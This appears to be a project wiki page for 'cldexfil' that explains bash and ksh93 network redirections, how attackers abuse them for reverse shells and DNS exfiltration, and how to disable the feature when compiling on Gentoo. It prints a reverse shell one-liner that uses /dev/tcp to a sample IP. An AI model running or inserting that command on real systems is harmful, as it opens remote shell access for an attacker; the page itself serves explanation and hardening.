-
Notifications
You must be signed in to change notification settings - Fork 0
cldexfil shells net redirection
Several Unix shells such as bash or ksh93 implement net redirections. This feature allow you (or an attacker with the ability to execute shell commands) to redirect the input and output to a stateless UDP or an established TCP socket. This features is frequently used by attackers to establish non-interactive shells by injecting commands such as:
$ bash -i >& /dev/tcp/10.10.1.2/31337 0>&1
This feature can also be abused to craft valid DNS queries in such a way that a victim's DNS forwarder will trustfully forward these queries to the world-wide internet, and in particular to the attacker's authoritative DNS server(s). This feature open up innovative exploitation and exfiltration opportunities, such as client-less data ex-filtration over the DNS channel (see the cldexfil project page for more information).
The table below includes a non-exhaustive list of shells that implement and support the net redirections feature:
| Shell | Version |
|---|---|
| ATT ksh | ksh93 |
| GNU Bash | 2.04 and higher |
The net redirections feature is enabled by default on all major Linux and Unix distributions such as Ubuntu, Arch Linux, Gentoo and CentOS, with a few notable exceptions like Debian and OpenBSD.
For security reasons you may want to disable the net redirections feature entirely at compile time.
# EXTRA_ECONF="--disable-net-redirections" emerge --ask --verbose bash
# echo 'EXTRA_ECONF="--disable-net-redirections"' > /etc/portage/env/bash.conf
# echo 'app-shells/bash bash.conf' >> /etc/portage/package.env
# emerge app-shells/bash